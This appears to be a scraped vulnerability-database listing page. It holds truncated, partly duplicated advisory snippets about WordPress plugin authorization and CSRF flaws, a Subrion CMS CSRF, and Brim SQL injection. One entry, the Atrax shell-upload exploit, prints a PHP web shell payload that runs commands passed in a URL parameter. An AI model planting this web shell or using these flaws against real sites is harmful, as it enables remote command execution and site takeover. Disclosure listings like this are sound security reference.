CVE-2021-24190

Low privileged users can use the AJAX action 'cppluginsdobuttonjoblatercallback' in the WooCommerce Conditional Marketing Mailer WordPress plugin before 1.5.2, to install any plugin including a specific version from the WordPress repository, as well as activate arbitrary plugin from then blog,...

CVE-2021-24191

Low privileged users can use the AJAX action 'cppluginsdobuttonjoblatercallback' in the WP Maintenance Mode & Site Under Construction WordPress plugin before 1.8.2, to install any plugin including a specific version from the WordPress repository, as well as activate arbitrary plugin from then blo...

CVE-2021-24191

The CVE-2021-24191 entry concerns the WordPress WP Maintenance Mode & Site Under Construction plugin (versions before 1.8.2). A low-privilege user can abuse the AJAX action cp_plugins_do_button_job_later_callback to install any plugin (including a specific version) from the WordPress repository a...

CVE-2021-24192 Tree Sitemap < 2.9 - Arbitrary Plugin Installation/Activation via Low Privilege User

Low privileged users can use the AJAX action 'cppluginsdobuttonjoblatercallback' in the Tree Sitemap WordPress plugin before 2.9, to install any plugin including a specific version from the WordPress repository, as well as activate arbitrary plugin from then blog, which helps attackers install...

WordPress plugin Visitor Traffic Real Time Statistics 安全漏洞

WordPress is the Wordpress Foundation's set of blogging platform developed using the PHP language . The platform supports PHP and MySQL servers to set up a personal blog site.WordPress Plugin is a WordPress open source application plugin . A vulnerability exists in the WordPress plugin before...

WordPress plugin Tree Sitemap 安全漏洞

WordPress is the Wordpress Foundation's set of blogging platform developed using the PHP language . The platform supports PHP and MySQL servers to set up a personal blog site.WordPress Plugin is a WordPress open source application plugin . An authorization issue vulnerability exists in versions o...

WordPress plugin WooCommerce Conditional Marketing Mailer 安全漏洞

WordPress is the Wordpress Foundation's set of blogging platform developed using the PHP language . The platform supports PHP and MySQL servers to set up a personal blog site.WordPress Plugin is a WordPress open source application plugin . An authorization issue vulnerability exists in versions o...

Multiple WP-Buy Plugins - Arbitrary Plugin Installation/Activation via CSRF

The "cppluginsdobuttonjoblatercallback" AJAX action, from multiple plugins of the WP-Buy vendor, was lacking CSRF check, allowing attackers to make a logged in administrator install and active arbitrary plugins including specific version from the WordPress repository which could lead to more...

Subrion Cross-Site Request Forgery Vulnerability

Subrion is a powerful and easy-to-use PHP content management system CMS with full source editing, per-page permissions, user activity monitoring and other powerful features. A cross-site request forgery vulnerability exists in panel/modules/plugins/ in Subrion 4.2.1. An attacker can exploit this...

CVE-2019-7357

Subrion CMS 4.2.1 has CSRF in panel/modules/plugins/. The attacker can remotely activate/deactivate the plugins...

Multiple Themes - Unauthenticated Function Injection

Jerome Bruandet, from nintechnet, discovered numerous themes affected by Unauthenticated Function Injection issues, due to the lack of capability and CSRF nonce checks in AJAX actions. The naturemag-lite theme partially fixed the issues in v1.0.5, however it has been removed from the WordPress...

Malware exploit: Atrax

Type: Shell Upload Vulnerability Author: Xylitol import random import string import base64 import urllib import urllib2 CONFIG payload = 'pre?php ifisset$GET"c"system$GET"c";else echo"No input?";?/pre' url = 'http://localhost/atrax/' /CONFIG BOTMODEINSERT = 'b' BOT MODE BOTMODERUNPLUGIN = 'e'...

CVE-2012-4422

wp-admin/plugins.php in WordPress before 3.4.2, when the multisite feature is enabled, does not check for network-administrator privileges before performing a network-wide activation of an installed plugin, which might allow remote authenticated users to make unintended plugin changes by leveragi...

CVE-2012-4422

wp-admin/plugins.php in WordPress before 3.4.2, when the multisite feature is enabled, does not check for network-administrator privileges before performing a network-wide activation of an installed plugin, which might allow remote authenticated users to make unintended plugin changes by leveragi...

CVE-2012-4422

wp-admin/plugins.php in WordPress before 3.4.2, when the multisite feature is enabled, does not check for network-administrator privileges before performing a network-wide activation of an installed plugin, which might allow remote authenticated users to make unintended plugin changes by leveragi...

CVE-2012-4422

CVE-2012-4422 affects WordPress prior to 3.4.2 with multisite enabled. The vulnerability arises when network-wide activation of plugins is performed without verifying network-administrator privileges, potentially allowing remote authenticated users to make unintended plugin changes by abusing the...

Brim 2.0.0 - SQL Injection Cross-Site Scripting

Brim 2.0.0 - SQL Injection Cross-Site Scripting || || | || o,7 || . o7 || 4||| ow, : / / . |-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=| | | | /' \ /'\ /\ \ /'\ /\ \ | | /, \ /\/\L\ \ \ \ ,/\ /\ \ \ \ / | | //\ \ /' \ /\ //\ Kings of injection | | // | | |...

Brim 2.0.0 (SQL/XSS) Multiple Remote Vulnerabilities

Exploit for unknown platform in category web applications ==================================================== Brim 2.0.0 SQL/XSS Multiple Remote Vulnerabilities ==================================================== Found by : Fisher762 Groups : inj3ct0r...